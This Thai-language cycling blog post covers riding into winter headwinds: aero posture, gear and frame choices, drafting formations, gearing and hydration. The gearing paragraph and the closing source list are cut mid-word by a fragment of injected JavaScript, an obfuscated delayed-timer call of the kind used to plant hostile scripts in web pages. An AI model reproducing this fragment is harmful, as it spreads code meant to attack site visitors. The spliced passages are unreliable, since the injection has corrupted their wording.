หลังจากกรมอุตุวิทยาได้ออกมาประกาศแล้วว่าเมืองไทยจะเข้าสู่ฤดูอย่างเป็นทางการ…แม้จะขัดแย้งกับอุณหภูมิในปัจจุบันก็ตาม นักปั่นเมืองไทยทุกคนควรจะเตรียมพร้อมรับมือกับกระแสลมที่มาพร้อมกับฤดูหนาว ตั้งแต่เดือน พ.ย. – ก.พ.
วิธีที่ดีที่สุดในการ”ปั่นสู้ลม” คือ การอยู่ในท่า Aerodynamic ให้มากที่สุด (และเมื่อยที่สุดเหมือนกัน) และอีกสิ่งที่ไม่ควรละเลย คือ การรักษาสมดุลของน้ำของร่างกาย (rehydration) เพราะในช่วงหน้าหนาว อากาศจะแห้งกว่าปกติโดยเฉพาะเขตภาคเหนือ กลาง ตะวันออกและตะวันออกเฉียเหนือ ส่วนภาคใต้ต้องขออภัยจริงๆ เพราะอากาศหนาวจะพัดผ่านอ่าวไทย หอบเอาความชื้นในทะเล ทำให้มีฝน และตกชุกมากในภาคใต้ฝั่งตะวันออก
กลยุทธ์ปั่นสู้ลม (หนาว) อย่างแรกคือ Aerodynamic ซึ่งสามารถแบ่งได้ออกเป็น
1. การจัดระเบียบร่างกายให้อยู่ในท่า Aerodynamic อย่างเช่นการจับที่ตัว Hood เก็บแขน เก็บขา อย่ากางออก งอศอกให้แขนระนาบไปกับพื้น แต่เมื่อปั่นไปนานๆ จะทำให้เราเมื่อยตรง หลังคอกับบริเวณ triceps มาก เราจึงมีวิธีแนะนำอีกแบบหนึ่งคือเลื่อนมาจับตรง drop เก็บขาเก็บแขน งอศอกแขนระนาบไปกับพื้นเหมือนเดิม ส่วนบริเวณศรีษะ เก็บคอนิดหนึ่ง หน้ามองตรง เพื่อมองเส้นทางและให้ท่อหลอดลมตรง เส้นทางหายใจจะได้คล่องขึ้น
ถ้าดูจากตารางด้านล่าง…อันดับหนึ่งก็คือการจัด posture ของนักั่นจัดรูปร่างระเบียบร่างกายสามารถเซฟ watt ได้เยอะที่สุด
2. ชุดแต่งการรัดกระชับตัวเป็นแนวที่ต้องใช้กำลังทรัพย์เข้าช่วยครับ อย่างเช่น การเลือกหมวกทรง aero แว่นตา เสื้อรัดรูปหรือเสื้อทรง aero เอาให้รัดติ้วไปเลย ผ้าคลุมรองเท้า ถุงน่องและปลอกแขนเป็นต้น
จากตารางทดสอบนี้ พบว่าในเรื่องของอุปกรณ์แต่งกาย หมวกกับชุดเข้ารูปจะเซฟ watt ได้เยอะที่สุด (12 watt) รองลงมาก็จะเป็นที่คลุมรองเท้า 8 watt (ถ้าจะโกนขนหน้าแข้งก็เซฟไปอีก 16 watt เลย แต่โดนแดดนี้แสบแน่นอน ถ้าไม่อยากโกนก็ลองใช้ถุงน่องดูครับ)
3. ว่าด้วยเฟรมและล้อ…การเลือกเฟรม Aero และการใช้ล้อแบบ deep-section wheel ก็มีส่วนในการเพิ่ม aerodynamic แต่ในวันที่มีกระแสลมแรง แนะนำว่าควรใช้ล้อขอบต่ำ หรือใช้ล้อหน้าขอบต่ำเพื่อเพิ่มการควบคุมทิสทางจักรยาน ตามคำแนะนำของ GCN ไม่ควรใช้ล้อที่สูงกว่า 50mm แต่แนะนำให้ใช้แค่ 25 mm


มาดูคลิปเต้มได้จาก GCN เลยครับ
การเลือกเฟรมสามารถดูได้ที่การทดลองของเวบไซด์ www.cyclingweekly.co.uk ได้ใช้รถจักรยานสองแบบคือ
- Canyon Ultimate CF SLX แทนรถทรงธรรมดาทั่วไป
- Cervelo S5 แทนรถทรง aero
ทำการทดลองปั่นเป็นเวลา 10 นาที ที่ Watt 200 และ 300 โดยการปั่นที่ 200 watt เป้นตัวแทนการปั่นที่นักปั่นทั่วไป ทั้งมือสมัครเล่นและมืออาชีพสามารถผลิตได้ และขณะที่ 300 watt เป็นตัวแทนของการปั่นจักรยาน Time trial
ผลการทดลองออกมาเป็น…
The Canyon Ultimate CF SLX
- ปั่น 200W ทำระยะทางได้ 5150m ความเร็วเฉลี่ย of 30.9kph
- ปั่น 300W ทำระยะทางได้ 6055m ความเร็วเฉลี่ย of 36.3kph
The Cervelo S5
- ปั่น 200W ทำระยะทางได้ 5425m ความเร็วเฉลี่ย 32.6kph
- ปั่น 300W ทำระยะทางได้ 6490m ความเร็วเฉลี่ย 38.9kph
สรุปได้ว่ารถจักรยานทรง aero ทำได้ดีกว่าทั้งในเรื่องความเร็วและระยะทาง แต่ใครที่มีรถทรงธรรมดาไม่อยากเสียตังค์ซื้อคันใหม่ก็สามารถเปลี่ยนล้อ เปลี่ยนหมวก เปลี่ยนเครื่องแต่งกายแทนก็ได้ สามารถสู้จักรยาน aero ได้อยู่เหมือนกัน…อย่าลืมอัพแรงขาด้วยนะครับ
นอกจากนี้ยังมีอุปกรณ์อื่นๆ อีกยิบย่อยที่เราสามารถเปลี่ยนให้เกิด aerodynamic ได้อีก อย่างเช่น ล้อขนาด 25mm ที่ทำให้เกิดรูปทรงหยดน้ำ มี rolling resistance น้อยลง กระติกน้ำทรง aero หรือจะเป็น aero bar เป้นต้น
มาดูกันต่อที่เทคนิคสู้ลมด้วยการปั่นเป็นกลุ่ม ซึ่งก็คงหนีไม่พ้นการ drafting การทำ The Echelon, Rolling Turns และThe Paceline
ถ้าดูกันที่การ drafting แน่นอนว่าคนแรกคือคนที่เสียพลังงานมากที่สุด ถ้าคนที่อยู่ตรงหน้าคุณคือศัตรู จึงดูดเค้าให้มากที่สุด เก็บพลังงานไว้ใช้ตอนท้ายๆ ดีกว่า
การทำ echelon ใช้ในกรณีที่ต้องเจอกับ Crosswind หรือลมมาจากด้านข้าง การเคลื่อนไหว (หมุน) ของกลุ่มจักรยานจะเป็นแบบ pull off into the wind สามารถดูได้ตามรูป
แบบต่อมาคือ Rolling turn เป็นปั่นเป็นทีมที่มีการหมุนของผู้ปั่นอย่างต่อเนื่อง (smooth rotation) ผู้นำจะอยู่ข้างหน้าไม่กี่วินาทีและคนข้างหลังจะค่อยๆ ขึ้นมานำแทนที่ เป็นการปั่นที่ต้องใช้สกิลกลุ่มสูงมากและให้ efficiency สูง ทุกคนผลัดกันรับ workload เท่าๆ กัน นิยมใช้กับกลุ่มเล็กๆ
ตัวอย่างดูได้จากคลิป
วิธีต่อไปคือ Paceline หรือผลัดกันลาก เมื่อต้องการเน้นความเร็วมากกว่า efficiency ใช้ในการควบคุมความเร็ว อย่างทีม TT และกลุ่ม peloton
เป็น Single paceline วิธีที่ใช้กันบ่อยทั่วไปในทีมต่างๆ
หรือจะเป็นแบบ double paceline ซึ่งคล้ายๆ กับการ Rolling turn
วิธีการสู้ลมโดยการใช่เกียร์ อาจจะแบ่งได้
- ปั่นเกียร์หนักขึ้นมาหน่อย ในรอบขาที่ช้าลง แต่จะได้การควบคุม (Handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andling) ที่ดีกว่า การลดเกียร์ลงมีความเป็นได้ที่เราจะเริ่มปั่นช้าลง
- ขึ้นเกียร์สูง ทำความเร็วเพื่อสู้กับลมในระยะเวลาหนึ่งๆ (แน่นอนว่าเหนื่อย) แนะนำว่านักปั่นต้องรู้จักเส้นทาง สภาพอากาศ ทิศทางลมอย่างดี จุดไหนควรปรับเปลี่ยนทิศทาง
- ปั่นเกียร์เบา ใช้รอบขาสูง เหมือนขึ้นเขา แต่การควบคุมจะลดลงมา
สุดท้ายการปั่นในฤดูหนาวนอกจากลมแล้วยังมีเรื่องของการดื่มน้ำ เพราะอากาศหนาวจะมีความชื้นน้อย หรืออากาศแห้ง น้ำจะระเหยได้เร็ว ร่างกายสูญเสียน้ำแม้จะไม่รู้จึกว่าเหงื่อออกเยอะก็ตาม การขาดสมดุลของน้ำมีผลต่อ performance ของเรา นักปั่นจึงควรหมั่นดื่มน้ำเป็นระยะ
ที่มาwww.cyclingweekly.co.uk www.cyclingweekly.co.ukwww.cyclingweekly.co.ukandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-strategies.html”>myworldfromabicycle.blogspot.comintheknowcycling.comcyclingtips.com.au